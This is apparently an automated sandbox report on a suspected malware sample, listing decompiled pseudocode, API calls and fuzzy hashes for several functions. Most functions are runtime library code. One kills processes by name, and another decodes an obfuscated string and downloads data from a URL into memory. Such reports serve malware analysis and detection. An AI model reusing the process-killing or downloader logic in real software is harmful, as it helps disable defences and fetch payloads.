String ID: (k#?$-$/1'-
API String ID: 649218774-1865253682
Opcode ID: 93bc8dec763b59b55c6ac34b0c1bf8eec4c925c1c6c6088244969185b62c0d60
Instruction ID: 1998e1c425329f2861ae63c692fefbb3e2e4c8fae4b65d813b61af8edacb3e0c
Opcode Fuzzy Hash: 93bc8dec763b59b55c6ac34b0c1bf8eec4c925c1c6c6088244969185b62c0d60
Instruction Fuzzy Hash: 00316FB0D02219AAEB15AFA48895ABF7BECEF11304F1044ADE51277181DE784F05AB66

Uniqueness

Uniqueness Score: -1.00%

Function 00B5D89C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B5D89C(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0xb6a8e8 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0xb36b48 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00B563DD(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00B563DD(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x00b5d8a5
0x00b5d94f
0x00b5d8ad
0x00b5d8af
0x00b5d8b6
0x00b5d8b8
0x00b5d8be
0x00b5d8cb
0x00b5d8e0
0x00b5d8e4
0x00b5d936
0x00b5d936
0x00b5d93b
0x00b5d93f
0x00b5d942
0x00b5d942
0x00b5d948
0x00b5d94a
0x00b5d961
0x00b5d95a
0x00b5d960
0x00b5d960
0x00b5d94c
0x00b5d94c
0x00000000
0x00b5d94c
0x00b5d8e6
0x00b5d8ef
0x00b5d926
0x00b5d926
0x00b5d928
0x00b5d92a
0x00000000
0x00000000
0x00b5d932
0x00000000
0x00b5d932
0x00b5d8f9
0x00b5d8fe
0x00b5d903
0x00000000
0x00000000
0x00b5d90d
0x00b5d912
0x00b5d917
0x00000000
0x00000000
0x00b5d91c
0x00b5d922
0x00000000
0x00b5d922
0x00b5d8c3
0x00000000
0x00000000
0x00000000
0x00b5d8c9
0x00b5d958
0x00000000

Strings

ext-ms-, xrefs: 00B5D907
api-ms-, xrefs: 00B5D8F3

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 53bf7508d7b07ad1f9dcb9ed2ab1349a8b5af6a17fdc49fdd59d2b52f2b1547a
Instruction ID: 5fa89c65d2bd546e49a28d7b2dc4abedb38f27a5a8a363e2ed214f93a274e2e1
Opcode Fuzzy Hash: 53bf7508d7b07ad1f9dcb9ed2ab1349a8b5af6a17fdc49fdd59d2b52f2b1547a
Instruction Fuzzy Hash: 6A21D531A45225ABDB319A249C84B6A77D8EF467B2F2403E1EC05B72D1DA70ED0886E0

Uniqueness

Uniqueness Score: -1.00%

Function 00B49907, Relevance: 10.6, APIs: 7, Instructions: 67
processCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00B49907(void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				signed int _v16;
				char _v280;
				long _v308;
				void* _v312;
				void* _v316;
				signed int _t11;
				int _t15;
				signed int _t16;
				int _t17;
				intOrPtr* _t24;
				void* _t27;
				intOrPtr _t28;
				void* _t30;
				void* _t34;
				signed int _t35;

				_t37 = (_t35 & 0xfffffff8) - 0x130;
				_t11 =  *0xb69014; // 0x26ce9e99
				_v8 = _t11 ^ (_t35 & 0xfffffff8) - 0x00000130;
				_t30 = CreateToolhelp32Snapshot(0xf, 0);
				_v312 = 0x128;
				_t15 = Process32First(_t30,  &_v312);
				L12:
				while(_t15 != 0) {
					_t24 = _a4;
					_t16 =  &_v280;
					while(1) {
						_t27 =  *_t16;
						if(_t27 !=  *_t24) {
							break;
						}
						if(_t27 == 0) {
							L6:
							_t17 = 0;
							L8:
							if(_t17 == 0) {
								_t34 = OpenProcess(1, _t17, _v308);
								if(_t34 != 0) {
									TerminateProcess(_t34, 9);
									CloseHandle(_t34);
								}
							}
							_t15 = Process32Next(_t30,  &_v316);
							goto L12;
						}
						_t28 =  *((intOrPtr*)(_t16 + 1));
						_t7 = _t24 + 1; // 0xded00528
						if(_t28 !=  *_t7) {
							break;
						}
						_t16 = _t16 + 2;
						_t24 = _t24 + 2;
						if(_t28 != 0) {
							continue;
						}
						goto L6;
					}
					asm("sbb eax, eax");
					_t17 = _t16 | 0x00000001;
					goto L8;
				}
				CloseHandle(_t30);
				return E00B4AE43(_v16 ^ _t37);
			}

0x00b4990d
0x00b49913
0x00b4991a
0x00b4992d
0x00b4992f
0x00b4993d
0x00000000
0x00b499a4
0x00b49945
0x00b49948
0x00b4994c
0x00b4994c
0x00b49950
0x00000000
0x00000000
0x00b49954
0x00b49968
0x00b49968
0x00b49971
0x00b49973
0x00b49982
0x00b49986
0x00b4998b
0x00b49992
0x00b49992
0x00b49986
0x00b4999e
0x00000000
0x00b4999e
0x00b49956
0x00b49959
0x00b4995c
0x00000000
0x00000000
0x00b4995e
0x00b49961
0x00b49966
0x00000000
0x00000000
0x00000000
0x00b49966
0x00b4996c
0x00b4996e
0x00000000
0x00b4996e
0x00b499a9
0x00b499c2

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00B49927
Process32First.KERNEL32(00000000,00000128), ref: 00B4993D
OpenProcess.KERNEL32(00000001,?,?), ref: 00B4997C
TerminateProcess.KERNEL32(00000000,00000009), ref: 00B4998B
CloseHandle.KERNEL32(00000000), ref: 00B49992
Process32Next.KERNEL32 ref: 00B4999E
CloseHandle.KERNEL32(00000000), ref: 00B499A9

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: 9b7ff3f4d2b75643da11ce1471ee6fcd57b24d46dc5c096a22b1a82914422071
Instruction ID: 77a263f29e397150c92deeb4dd5dd81ea7e17c4763331a2b9618210a2b7894de
Opcode Fuzzy Hash: 9b7ff3f4d2b75643da11ce1471ee6fcd57b24d46dc5c096a22b1a82914422071
Instruction Fuzzy Hash: 8711D33124C241AFD7219B20CC59BFB7BE9EB46718F00049DF985C7290EF758A09D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00B5BC56, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B5BC56(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00B5B9A0(_t45, 7);
					E00B5B9A0(_t45 + 0x1c, 7);
					E00B5B9A0(_t45 + 0x38, 0xc);
					E00B5B9A0(_t45 + 0x68, 0xc);
					E00B5B9A0(_t45 + 0x98, 2);
					E00B564B8( *((intOrPtr*)(_t45 + 0xa0)));
					E00B564B8( *((intOrPtr*)(_t45 + 0xa4)));
					E00B564B8( *((intOrPtr*)(_t45 + 0xa8)));
					E00B5B9A0(_t45 + 0xb4, 7);
					E00B5B9A0(_t45 + 0xd0, 7);
					E00B5B9A0(_t45 + 0xec, 0xc);
					E00B5B9A0(_t45 + 0x11c, 0xc);
					E00B5B9A0(_t45 + 0x14c, 2);
					E00B564B8( *((intOrPtr*)(_t45 + 0x154)));
					E00B564B8( *((intOrPtr*)(_t45 + 0x158)));
					E00B564B8( *((intOrPtr*)(_t45 + 0x15c)));
					return E00B564B8( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00b5bc5c
0x00b5bc61
0x00b5bc6a
0x00b5bc75
0x00b5bc80
0x00b5bc8b
0x00b5bc99
0x00b5bca4
0x00b5bcaf
0x00b5bcba
0x00b5bcc8
0x00b5bcd6
0x00b5bce7
0x00b5bcf5
0x00b5bd03
0x00b5bd0e
0x00b5bd19
0x00b5bd24
0x00000000
0x00b5bd34
0x00b5bd39

APIs

Part of subcall function 00B5B9A0: _free.LIBCMT ref: 00B5B9C5

_free.LIBCMT ref: 00B5BCA4

Part of subcall function 00B564B8: HeapFree.KERNEL32(00000000,00000000,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B5BCAF
_free.LIBCMT ref: 00B5BCBA
_free.LIBCMT ref: 00B5BD0E
_free.LIBCMT ref: 00B5BD19
_free.LIBCMT ref: 00B5BD24
_free.LIBCMT ref: 00B5BD2F

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c10f8ffbfca1b25f443b7e7f469d2830260845910d70a3871c218f98df1c71fa
Instruction ID: a9b13363b1f11350bdbe8723ab6f40f2dab4df7c40ca7f82e609993bc910898b
Opcode Fuzzy Hash: c10f8ffbfca1b25f443b7e7f469d2830260845910d70a3871c218f98df1c71fa
Instruction Fuzzy Hash: 7F11F171550B08AAD960BBB0CC47FCB77DC9F04702FC048D5BB99A61A2DB69B5094661

Uniqueness

Uniqueness Score: -1.00%

Function 00B622B6, Relevance: 9.3, APIs: 6, Instructions: 319
fileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00B622B6(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				long _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				long _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t172;
				signed int _t174;
				intOrPtr _t176;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				long _t235;
				struct _OVERLAPPED* _t243;
				signed int _t246;
				intOrPtr _t249;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				struct _OVERLAPPED* _t256;
				intOrPtr _t258;
				void* _t262;
				long _t263;
				signed char _t264;
				signed int _t265;
				void* _t266;
				void* _t268;
				struct _OVERLAPPED* _t269;
				long _t270;
				signed int _t271;
				long _t275;
				signed int _t278;
				long _t279;
				struct _OVERLAPPED* _t280;
				signed int _t282;
				intOrPtr _t284;
				signed int _t286;
				signed int _t289;
				long _t290;
				long _t291;
				signed int _t292;
				intOrPtr _t293;
				signed int _t294;
				void* _t295;
				void* _t296;

				_t172 =  *0xb69014; // 0x26ce9e99
				_v8 = _t172 ^ _t294;
				_t174 = _a8;
				_t263 = _a12;
				_t282 = (_t174 & 0x0000003f) * 0x38;
				_t246 = _t174 >> 6;
				_v112 = _t263;
				_v84 = _t246;
				_t176 =  *((intOrPtr*)(0xb6a6c8 + _t246 * 4));
				_v80 = _t282;
				_t10 = _t176 + 0x18; // 0x8458b01
				_t284 = _a16 + _t263;
				_v116 =  *((intOrPtr*)(_t282 + _t10));
				_v104 = _t284;
				_t178 = GetConsoleCP();
				_t243 = 0;
				_v124 = _t178;
				E00B519CE( &_v72, 0);
				asm("stosd");
				_t249 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t249;
				asm("stosd");
				asm("stosd");
				_t275 = _v112;
				_v40 = _t275;
				if(_t275 >= _t284) {
					L52:
					__eflags = _v60 - _t243;
				} else {
					_t286 = _v92;
					while(1) {
						_v47 =  *_t275;
						_v76 = _t243;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0xb6a6c8 + _v84 * 4));
						_v52 = _t186;
						if(_t249 != 0xfde9) {
							goto L23;
						}
						_t265 = _v80;
						_t212 = _t186 + 0x2e + _t265;
						_t256 = _t243;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t256)) != _t243) {
							_t256 =  &(_t256->Internal);
							if(_t256 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t278 = _v104 - _t213;
						_v44 = _t256;
						if(_t256 <= 0) {
							_t258 =  *((char*)(( *_t213 & 0x000000ff) + 0xb691d8)) + 1;
							_v52 = _t258;
							__eflags = _t258 - _t278;
							if(_t258 > _t278) {
								__eflags = _t278;
								if(_t278 <= 0) {
									goto L44;
								} else {
									_t290 = _v40;
									do {
										_t266 = _t265 + _t243;
										_t216 =  *((intOrPtr*)(_t243 + _t290));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t266 +  *((intOrPtr*)(0xb6a6c8 + _v84 * 4)) + 0x2e)) = _t216;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									goto L43;
								}
							} else {
								_t279 = _v40;
								__eflags = _t258 - 4;
								_v144 = _t243;
								_t260 =  &_v144;
								_v140 = _t243;
								_v56 = _t279;
								_t219 = (0 | _t258 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t265 + _v52 + 0x2e) & 0x000000ff) + 0xb691d8)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t256;
							_v52 = _t229;
							if(_t229 > _t278) {
								__eflags = _t278;
								if(_t278 > 0) {
									_t291 = _v40;
									do {
										_t268 = _t265 + _t243 + _t256;
										_t231 =  *((intOrPtr*)(_t243 + _t291));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t268 +  *((intOrPtr*)(0xb6a6c8 + _v84 * 4)) + 0x2e)) = _t231;
										_t256 = _v44;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									L43:
									_t286 = _v92;
								}
								L44:
								_t289 = _t286 + _t278;
								__eflags = _t289;
								L45:
								__eflags = _v60;
								_v92 = _t289;
							} else {
								_t269 = _t243;
								if(_t256 > 0) {
									_t293 = _v108;
									do {
										 *((char*)(_t294 + _t269 - 0xc)) =  *((intOrPtr*)(_t293 + _t269));
										_t269 =  &(_t269->Internal);
									} while (_t269 < _t256);
									_t229 = _v52;
								}
								_t279 = _v40;
								if(_t229 > 0) {
									E00B4D670( &_v16 + _t256, _t279, _v52);
									_t256 = _v44;
									_t295 = _t295 + 0xc;
								}
								if(_t256 > 0) {
									_t270 = _v44;
									_t280 = _t243;
									_t292 = _v80;
									do {
										_t262 = _t292 + _t280;
										_t280 =  &(_t280->Internal);
										 *(_t262 +  *((intOrPtr*)(0xb6a6c8 + _v84 * 4)) + 0x2e) = _t243;
									} while (_t280 < _t270);
									_t279 = _v40;
								}
								_v136 = _t243;
								_v120 =  &_v16;
								_t260 =  &_v136;
								_v132 = _t243;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E00B63A20(_t260);
								_t296 = _t295 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t275 = _t279 + _v52 - 1;
									L31:
									_t275 = _t275 + 1;
									_v40 = _t275;
									_t193 = E00B5A975(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
									_t295 = _t296 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t286 = _v88 - _v112 + _t275;
											_v92 = _t286;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t275 >= _v104) {
														goto L52;
													} else {
														_t249 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t286 = _t286 + 1;
															_v92 = _t286;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t252 = _v80;
						_t264 =  *((intOrPtr*)(_t252 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t275;
							_t188 = E00B55632();
							_t253 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t253 * 2)) - _t243;
							if( *((intOrPtr*)(_t188 + _t253 * 2)) >= _t243) {
								_push(1);
								_push(_t275);
								goto L30;
							} else {
								_t202 = _t275 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t271 = _v84;
									_t255 = _v80;
									 *((char*)(_t255 +  *((intOrPtr*)(0xb6a6c8 + _t271 * 4)) + 0x2e)) = _v33;
									 *(_t255 +  *((intOrPtr*)(0xb6a6c8 + _t271 * 4)) + 0x2d) =  *(_t255 +  *((intOrPtr*)(0xb6a6c8 + _t271 * 4)) + 0x2d) | 0x00000004;
									_t289 = _t286 + 1;
									goto L45;
								} else {
									_t206 = E00B5FAC5( &_v76, _t275, 2);
									_t296 = _t295 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t275 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t252 + _t186 + 0x2e));
							_v23 =  *_t275;
							_push(2);
							 *(_t252 + _v52 + 0x2d) = _t264 & 0x000000fb;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E00B5FAC5();
							_t296 = _t295 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t294;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E00B4AE43(_v8 ^ _t294);
			}

0x00b622c1
0x00b622c8
0x00b622cb
0x00b622d0
0x00b622d8
0x00b622db
0x00b622df
0x00b622e2
0x00b622e5
0x00b622ec
0x00b622ef
0x00b622f6
0x00b622f8
0x00b622fb
0x00b622fe
0x00b62304
0x00b62306
0x00b6230d
0x00b6231a
0x00b6231b
0x00b6231e
0x00b62321
0x00b62322
0x00b62323
0x00b62326
0x00b6232b
0x00b62637
0x00b62637
0x00b62331
0x00b62331
0x00b62334
0x00b62336
0x00b6233c
0x00b6233f
0x00b62346
0x00b6234d
0x00b62356
0x00000000
0x00000000
0x00b6235c
0x00b62362
0x00b62364
0x00b62366
0x00b62369
0x00b6236e
0x00b62372
0x00000000
0x00000000
0x00000000
0x00b62372
0x00b62377
0x00b6237a
0x00b6237c
0x00b62381
0x00b62433
0x00b62434
0x00b62437
0x00b62439
0x00b625e7
0x00b625e9
0x00000000
0x00b625eb
0x00b625eb
0x00b625ee
0x00b625f1
0x00b625fa
0x00b625fd
0x00b625fe
0x00b62602
0x00b62605
0x00b62605
0x00000000
0x00b62609
0x00b6243f
0x00b6243f
0x00b62444
0x00b62447
0x00b6244d
0x00b62453
0x00b6245c
0x00b6245f
0x00b6245f
0x00b62460
0x00b62461
0x00b62464
0x00b62465
0x00000000
0x00b62465
0x00b62387
0x00b62396
0x00b62397
0x00b6239a
0x00b6239c
0x00b623a1
0x00b625b2
0x00b625b4
0x00b625b6
0x00b625b9
0x00b625be
0x00b625c7
0x00b625ca
0x00b625cb
0x00b625cf
0x00b625d2
0x00b625d5
0x00b625d5
0x00b625d9
0x00b625d9
0x00b625d9
0x00b625dc
0x00b625dc
0x00b625dc
0x00b625de
0x00b625de
0x00b625e2
0x00b623a7
0x00b623a7
0x00b623ab
0x00b623ad
0x00b623b0
0x00b623b3
0x00b623b7
0x00b623b8
0x00b623bc
0x00b623bc
0x00b623bf
0x00b623c4
0x00b623d0
0x00b623d5
0x00b623d8
0x00b623d8
0x00b623dd
0x00b623df
0x00b623e2
0x00b623e4
0x00b623e7
0x00b623ea
0x00b623ed
0x00b623f5
0x00b623f9
0x00b623fd
0x00b623fd
0x00b62403
0x00b62409
0x00b6240c
0x00b62414
0x00b6241b
0x00b6241f
0x00b62420
0x00b62423
0x00b62424
0x00b62468
0x00b62468
0x00b6246c
0x00b6246d
0x00b62472
0x00b62478
0x00000000
0x00b6247e
0x00b62482
0x00b6250b
0x00b62512
0x00b6251a
0x00b62522
0x00b62527
0x00b6252a
0x00b6252f
0x00000000
0x00b62535
0x00b6254a
0x00b6262e
0x00b62634
0x00000000
0x00b62550
0x00b62559
0x00b6255b
0x00b62561
0x00000000
0x00b62567
0x00b6256b
0x00b625a1
0x00b625a4
0x00000000
0x00b625aa
0x00b625aa
0x00000000
0x00b625aa
0x00b6256d
0x00b6256f
0x00b62571
0x00b6258a
0x00000000
0x00b62590
0x00b62594
0x00000000
0x00b6259a
0x00b6259a
0x00b6259d
0x00b6259e
0x00000000
0x00b6259e
0x00b62594
0x00b6258a
0x00b6256b
0x00b62561
0x00b6254a
0x00b6252f
0x00b62478
0x00b623a1
0x00000000
0x00b62489
0x00b62489
0x00b6248c
0x00b62490
0x00b62493
0x00b624b5
0x00b624b8
0x00b624bd
0x00b624c1
0x00b624c5
0x00b624f3
0x00b624f5
0x00000000
0x00b624c7
0x00b624c7
0x00b624ca
0x00b624cd
0x00b624d0
0x00b6260b
0x00b6260e
0x00b6261b
0x00b62626
0x00b6262b
0x00000000
0x00b624d6
0x00b624dd
0x00b624e2
0x00b624e5
0x00b624e8
0x00000000
0x00b624ee
0x00b624ee
0x00000000
0x00b624ee
0x00b624e8
0x00b624d0
0x00b62495
0x00b6249c
0x00b624a1
0x00b624a7
0x00b624a9
0x00b624b0
0x00b624f6
0x00b624f9
0x00b624fa
0x00b624ff
0x00b62502
0x00b62505
0x00000000
0x00000000
0x00000000
0x00000000
0x00b62505
0x00000000
0x00b62493
0x00b62334
0x00b6263a
0x00b6263a
0x00b6263c
0x00b6263f
0x00b6263f
0x00b6263f
0x00b6263f
0x00b62651
0x00b62653
0x00b62654
0x00b62655
0x00b62661

APIs

GetConsoleCP.KERNEL32(8304488B,00B513E1,00000000), ref: 00B622FE
__fassign.LIBCMT ref: 00B624DD
__fassign.LIBCMT ref: 00B624FA
WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B62542
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B62582
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B6262E

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 69a8f322771d2d734614c16c5da284bc0bf164473563b0f716fdd44ae6b18b8d
Instruction ID: 8cfb461868226d8d41bac1ca454f3ed6a3c9d9291a317b104be7f8a4350892eb
Opcode Fuzzy Hash: 69a8f322771d2d734614c16c5da284bc0bf164473563b0f716fdd44ae6b18b8d
Instruction Fuzzy Hash: 59D19971D016589FDF15CFA8C8809EDBBF5FF48304F2801AAE856BB352D635AA46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B489B2, Relevance: 9.1, APIs: 6, Instructions: 108
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00B489B2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __ebp, char* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v72;
				char _v2005;
				intOrPtr _v2008;
				void _v2048;
				char _v2064;
				char _v2120;
				intOrPtr _v2124;
				void* _v2132;
				long _v2176;
				intOrPtr _v2188;
				void* _v2192;
				signed int _t26;
				char* _t51;
				char* _t53;
				void* _t60;
				char* _t63;
				void* _t64;
				void _t68;
				signed int _t70;

				_t70 =  &_v2132;
				_t26 =  *0xb69014; // 0x26ce9e99
				_v4 = _t26 ^ _t70;
				asm("movaps xmm0, [0xb3dc00]");
				asm("movups [esp+0xc], xmm0");
				asm("movaps xmm0, [0xb3dd50]");
				_t51 = 0;
				asm("movups [esp+0x20], xmm0");
				_t53 = 0;
				_v2124 = _a8;
				asm("movaps xmm0, [0xb3dd80]");
				asm("movups [esp+0x30], xmm0");
				asm("movaps xmm0, [0xb3dd70]");
				_t68 = 0;
				asm("movups [esp+0x44], xmm0");
				asm("movaps xmm0, [0xb3df10]");
				_t63 = _a4;
				asm("movups [esp+0x58], xmm0");
				asm("movaps xmm0, [0xb3df20]");
				asm("movups [esp+0x6c], xmm0");
				_v2132 = 0;
				asm("movaps xmm0, [0xb3df00]");
				asm("movups [esp+0x7c], xmm0");
				_v2008 = 0x84829e;
				do {
					_t7 = _t53 + 0x40; // 0x40
					 *(_t70 + _t53 + 0x1c) =  *(_t70 + _t53 + 0x1c) ^ _t7;
					_t53 = _t53 + 1;
				} while (_t53 < 0x73);
				_v2005 = 0;
				_t60 = InternetOpenA( &_v2120, 0, 0, 0, 0);
				if(_t60 != 0) {
					_t64 = InternetOpenUrlA(_t60, _t63, 0, 0, 0x84000000, 0);
					__eflags = _t64;
					if(__eflags != 0) {
						do {
							InternetReadFile(_t64,  &_v2048, 0x7d0,  &_v2176);
							_push(_v2192 + _t68);
							_v2188 = E00B4B0B6(__edx, __eflags);
							E00B4D670(_t38, _t51, _t68);
							E00B4D670(_v2188 + _t68,  &_v2064, _v2192);
							L00B4AE54(_t51);
							_t68 = _v2192 + _t68;
							_t70 = _t70 + 0x20;
							__eflags = _v2192;
							_t51 = _v2188;
						} while (__eflags != 0);
						InternetCloseHandle(_t64);
						InternetCloseHandle(_t60);
						 *_v2192 = _t68;
					} else {
						InternetCloseHandle(_t60);
						goto L3;
					}
				} else {
					L3:
				}
				return E00B4AE43(_v72 ^ _t70);
			}

0x00b489b2
0x00b489b8
0x00b489bf
0x00b489c6
0x00b489d4
0x00b489da
0x00b489e1
0x00b489e3
0x00b489e8
0x00b489ea
0x00b489ee
0x00b489f5
0x00b489fb
0x00b48a02
0x00b48a04
0x00b48a0a
0x00b48a11
0x00b48a18
0x00b48a1e
0x00b48a25
0x00b48a2a
0x00b48a2e
0x00b48a35
0x00b48a3a
0x00b48a45
0x00b48a45
0x00b48a48
0x00b48a4c
0x00b48a4d
0x00b48a5a
0x00b48a68
0x00b48a6c
0x00b48a85
0x00b48a87
0x00b48a89
0x00b48a94
0x00b48aa7
0x00b48ab3
0x00b48abc
